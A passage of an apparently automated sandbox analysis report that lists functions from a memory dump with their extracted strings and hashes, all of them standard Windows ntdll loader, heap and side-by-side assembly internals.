                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                                              • @, xrefs: 0181259B
                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                              • API String ID: 0-4009184096
                                                                              • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                                              • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                                              • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                                              • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                                              Function 01848B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                              • API String ID: 0-2515994595
                                                                              • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                                              • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                                              • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                                              • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                                              Function 01850274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                                              • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                                              • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                                              • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                                              Function 018289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                                              • HandleTraces, xrefs: 01828C8F
                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                                              • VerifierDebug, xrefs: 01828CA5
                                                                              • VerifierFlags, xrefs: 01828C50
                                                                              • VerifierDlls, xrefs: 01828CBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                              • API String ID: 0-3223716464
                                                                              • Opcode ID: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                                              • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                                              • Opcode Fuzzy Hash: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                                              • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                                              Function 017AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                              • API String ID: 0-1109411897
                                                                              • Opcode ID: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                                              • Instruction ID: 34346c81525637b59a0d8f946af4884f9f2eff56466dc3f9fca8a4001475ddfd
                                                                              • Opcode Fuzzy Hash: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                                              • Instruction Fuzzy Hash: A6A23B74A0562A8FDB65DF18CC887ADFBB5AF85304F5442E9D90DA7290DB309E85CF40
                                                                              Function 017D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                                              • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                                              • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                                              • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                                              Function 0179645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                                              • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                                              • apphelp.dll, xrefs: 01796496
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-204845295
                                                                              • Opcode ID: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                                              • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                                              • Opcode Fuzzy Hash: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                                              • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                                              Function 017D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                                              • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                              • API String ID: 0-861424205
                                                                              • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                                              • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                                              • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                                              • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                                              Function 017DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                                              • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                                              • LdrpInitializeProcess, xrefs: 017DC6C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              • Opcode ID: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                                              • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                                              • Opcode Fuzzy Hash: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                                              • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                                              Function 017E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 1404860816-0
                                                                              • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                                              • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                                              • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                                              • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                                              Function 017B29A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                              • API String ID: 0-3126994380
                                                                              • Opcode ID: c0787118fc056eae4f68f212585308d4e2aab0b76802e8e59f0e826a7d9af69c
                                                                              • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                                              • Opcode Fuzzy Hash: c0787118fc056eae4f68f212585308d4e2aab0b76802e8e59f0e826a7d9af69c
                                                                              • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                                              Function 017AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                              • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                                              • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                              • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                                              Function 017D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                                              • @, xrefs: 017D8591
                                                                              • LdrpInitializeProcess, xrefs: 017D8422
                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1918872054
                                                                              • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                              • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                                              • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                              • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                                              Function 017D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • .Local, xrefs: 017D28D8
                                                                              • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                              • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                                              • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                              • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                                              Function 017D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                                              • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                              • API String ID: 0-1245972979
                                                                              • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                              • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                                              • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                              • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                                              Function 017A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                              • API String ID: 0-1468400865
                                                                              • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                              • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                                              • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                              • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                                              Function 017C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                                              • LdrpDynamicShimModule, xrefs: 0180A998
                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                                              • apphelp.dll, xrefs: 017C2462
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-176724104
                                                                              • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                              • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                                              • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                              • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                                              Function 017B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                              • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                                              • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                              • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                                              Function 017C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $@
                                                                              • API String ID: 0-1077428164
                                                                              • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                              • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                                              • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                              • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                                              Function 0179A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                              • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                                              • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                              • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                                              Function 017C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                                              • LdrpCheckModule, xrefs: 0180A117
                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-161242083
                                                                              • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                              • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                                              • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                              • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                                              Function 017B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
